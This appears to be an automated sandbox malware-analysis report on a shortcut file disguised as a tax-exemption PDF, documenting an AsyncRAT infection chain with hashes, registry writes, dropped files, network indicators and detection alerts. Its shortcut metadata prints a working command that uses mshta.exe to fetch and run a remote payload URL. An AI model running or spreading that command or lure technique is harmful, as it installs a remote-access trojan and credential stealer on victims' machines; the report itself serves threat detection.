File name:	Retum off Organization Exempt From Income Tax.pdf Adobe Acrobat Document.lnk
Full analysis:	https://app.any.run/tasks/e72bda57-1f6a-46d4-be4b-def567b23676
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	February 19, 2025, 17:35:46
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	psloramyra loader asyncrat rat remote stealer
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Unicoded, HasExpIcon "%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe", MachineID win-us3ihpa0nq6, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Sat May 8 08:14:46 2021, atime=Sat May 8 08:14:46 2021, mtime=Sat May 8 08:14:46 2021, length=32768, window=normal, IDListSize 0x013b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\mshta.exe"
MD5:	5C0BB364C434072C26B47A41521877AF
SHA1:	90DAEF14275695CFC24529465B5B5EC1E03E8A5D
SHA256:	E2FE3A262F19DFA345DF2C5DC20FA9C7AD7B8D3A1E229FD2ADF8AD67A4C83A7E
SSDEEP:	48:8FyCQUd8YdTBdTBdTBdTBdTBdTBdTCdTbJ8dJd3QUBB6mELBk8ZIRC3zaP/Jmz8i:8FtQtXudgy/iB9ZRzi/JmIQ

Flags:	IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpIcon, TargetMetadata
FileAttributes:	Archive
CreateDate:	2021:05:08 08:14:46+00:00
AccessDate:	2021:05:08 08:14:46+00:00
ModifyDate:	2021:05:08 08:14:46+00:00
TargetFileSize:	32768
IconIndex:	1
RunWindow:	Normal
HotKey:	(none)
TargetFileDOSName:	mshta.exe
DriveType:	Fixed Disk
DriveSerialNumber:	C48A-6DA4
VolumeLabel:	-
LocalBasePath:	C:\Windows\System32\mshta.exe
Description:	C:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media Player
RelativePath:	..\..\Windows\System32\mshta.exe
WorkingDirectory:	C:\Program Files\Windows Media Player
CommandLineArguments:	"https://casalomaminca.com/wp-content/uploads/2025/02/smbhta.html"
IconFileName:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
MachineID:	win-us3ihpa0nq6


(PID) Process:	(6480) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(6480) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(6480) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(6892) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:	write	Name:	VBSFile
Value:

PID	Process	Filename		Type
6480	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_34D61B4A2A4AE0D3DDAB879224BCA77B		binary
		MD5:F34AEF38220729E7E324FDB6EA88A339	SHA256:53429CF03D8ED22A6033FDB31A5604EE033D41FEE7E3CDA81A89F480CC6D11D5
6480	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D8BFCD35BA770A2050808D5BC8E612B8		binary
		MD5:356AEF2D5D0C34F0F70E668A1B7D0976	SHA256:4FD59E8ABDAF9B74DA2EE329AD9334027FE2970994CFE2DF8C05C2AB267ECA80
6480	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_34D61B4A2A4AE0D3DDAB879224BCA77B		binary
		MD5:3CA62A83307E03F9278D17813D36327C	SHA256:BB6C2EE56BD9D9B54CD14DE6A7E8E0285EEF74C427563E1FC8789FF0DD44C914
6892	powershell.exe	C:\Users\Public\1invoke.txt		text
		MD5:B9376E9E3C4D48F5E35A3F355AE1F74A	SHA256:90092E5FB861DD4FF34FA20F4B31CA44EBBB3BC367A8D7A35B89A7F89C793FA9
6892	powershell.exe	C:\Users\Public\1xx.txt		text
		MD5:14C2A6B7BF15E15D8DAE9CD4A56432D5	SHA256:79891821778C4CA9358C27E7FB66B0442A2921B661DF1293E398B18D81DA5D96
6892	powershell.exe	C:\Users\Public\1Execute.txt		text
		MD5:529CF04DB0F736467C7583EA80C3AA66	SHA256:67642E56281BC4AA846689BC725F8FCC76E61C20831AA4F7E2E0C8CDBA17E520
6892	powershell.exe	C:\Users\Public\1Framework.txt		text
		MD5:AF4D21F7D77E8A1BC4F82A834309AD0A	SHA256:149698FEA0657620E3972AB9FA450A868727C6DA1199E3706C4F1C98DFDD9FFC
6892	powershell.exe	C:\Users\Public\1load.txt		text
		MD5:F19DBF2EDB3A0BD74B0524D960FF21EB	SHA256:8A6BDB6B18DA586FE7F2ACBD8F1055533F2CD97A3681B3652BCD712224DF45C3
6892	powershell.exe	C:\Users\Public\1msg.txt		text
		MD5:7AFC3E31DA415ADFC49BFC83F7A3E4B9	SHA256:3CF6FA1823052A982A65251B031963014E600FBB2C4A7EC63E2194F530B764DF
6892	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AMJ3EXZFZ3BMZ2FTF7NM.temp		binary
		MD5:7736C0ABE626C1CE7F2D273745797655	SHA256:755C5C1084078A374B012CE404360C6F43DE1A1F6505D3CC80DEA246BF158D47

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
5064	SearchApp.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
1176	svchost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
—	—	GET	200	2.19.11.120:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	200	23.209.214.100:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
6264	SIHClient.exe	GET	200	23.209.214.100:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
6480	mshta.exe	GET	200	172.64.149.23:80	http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEGxVq9vQB5LHnQcM2BGe1r8%3D	unknown	—	—	whitelisted
6264	SIHClient.exe	GET	200	23.209.214.100:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6480	mshta.exe	GET	200	172.64.149.23:80	http://zerossl.ocsp.sectigo.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQILj%2F5BYz%2BinwYvRPv3x0WYHB6awQUyNl4aKLZGWjVPXLeXwo%2B3LWGhqYCEAm7VH5wnOhTEOmw6FjsbLg%3D	unknown	—	—	whitelisted
6152	backgroundTaskHost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D	unknown	—	—	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
—	—	2.19.11.120:80	crl.microsoft.com	Elisa Oyj	NL	whitelisted
—	—	23.209.214.100:80	www.microsoft.com	PT. Telekomunikasi Selular	ID	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
5064	SearchApp.exe	95.101.79.113:443	www.bing.com	Akamai International B.V.	NL	whitelisted
1176	svchost.exe	40.126.31.3:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
5064	SearchApp.exe	2.23.77.188:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
1176	svchost.exe	2.23.77.188:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
6480	mshta.exe	208.109.203.43:443	casalomaminca.com	GO-DADDY-COM-LLC	US	unknown

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208 40.127.240.158	whitelisted
crl.microsoft.com	2.19.11.120 2.19.11.105	whitelisted
www.microsoft.com	23.209.214.100	whitelisted
google.com	216.58.206.46	whitelisted
www.bing.com	95.101.79.113 95.101.79.114 95.101.79.91 95.101.79.97 95.101.79.99 95.101.79.90 95.101.79.105 95.101.79.81 95.101.79.88	whitelisted
login.live.com	40.126.31.3 20.190.159.4 20.190.159.68 20.190.159.73 40.126.31.2 40.126.31.130 40.126.31.73 20.190.159.64	whitelisted
ocsp.digicert.com	2.23.77.188	whitelisted
casalomaminca.com	208.109.203.43	unknown
ocsp.usertrust.com	172.64.149.23 104.18.38.233	whitelisted
zerossl.ocsp.sectigo.com	172.64.149.23 104.18.38.233	whitelisted

PID	Process	Class	Message
6480	mshta.exe	Misc activity	ET INFO Observed ZeroSSL SSL/TLS Certificate
6892	powershell.exe	Misc activity	ET INFO Observed ZeroSSL SSL/TLS Certificate
—	—	Potentially Bad Traffic	ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net
2192	svchost.exe	Potentially Bad Traffic	ET DYN_DNS DYNAMIC_DNS Query to a *.accesscam .org Domain
836	aspnet_regbrowsers.exe	Domain Observed Used for C2 Detected	REMOTE [ANY.RUN] AsyncRAT SSL certificate
836	aspnet_regbrowsers.exe	Domain Observed Used for C2 Detected	ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
836	aspnet_regbrowsers.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
836	aspnet_regbrowsers.exe	Malware Command and Control Activity Detected	REMOTE [ANY.RUN] AsyncRAT Successful Connection

General Info

Retum off Organization Exempt From Income Tax.pdf Adobe Acrobat Document.lnk

5C0BB364C434072C26B47A41521877AF

90DAEF14275695CFC24529465B5B5EC1E03E8A5D

E2FE3A262F19DFA345DF2C5DC20FA9C7AD7B8D3A1E229FD2ADF8AD67A4C83A7E

48:8FyCQUd8YdTBdTBdTBdTBdTBdTBdTCdTbJ8dJd3QUBB6mELBk8ZIRC3zaP/Jmz8i:8FtQtXudgy/iB9ZRzi/JmIQ

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes powershell execution policy (Bypass)

Bypass execution policy to execute commands

Run PowerShell with an invisible window

PSLORAMYRA has been detected

ASYNCRAT has been detected (MUTEX)

ASYNCRAT has been detected (YARA)

Steals credentials from Web Browsers

Actions looks like stealing of personal data

ASYNCRAT has been detected (SURICATA)

SUSPICIOUS

Starts POWERSHELL.EXE for commands execution

Starts CMD.EXE for commands execution

Executes script without checking the security policy

The process bypasses the loading of PowerShell profile settings

Executing commands from a ".bat" file

Likely accesses (executes) a file from the Public directory

The process executes VB scripts

The process executes Powershell scripts

Converts a specified value to an integer (POWERSHELL)

Converts a specified value to a byte (POWERSHELL)

Runs shell command (SCRIPT)

Connects to unusual port

Contacting a server suspected of hosting an CnC

INFO

Checks transactions between databases Windows and Oracle

Checks proxy server information

Reads Internet Explorer settings

Disables trace logs

Script raised an exception (POWERSHELL)

Gets data length (POWERSHELL)

Uses string replace method (POWERSHELL)

Converts byte array into ASCII string (POWERSHELL)

Reads the computer name

Checks supported languages

Reads the machine GUID from the registry

Reads the software policy settings

Malware configuration

AsyncRat

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Malware configuration

AsyncRat

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information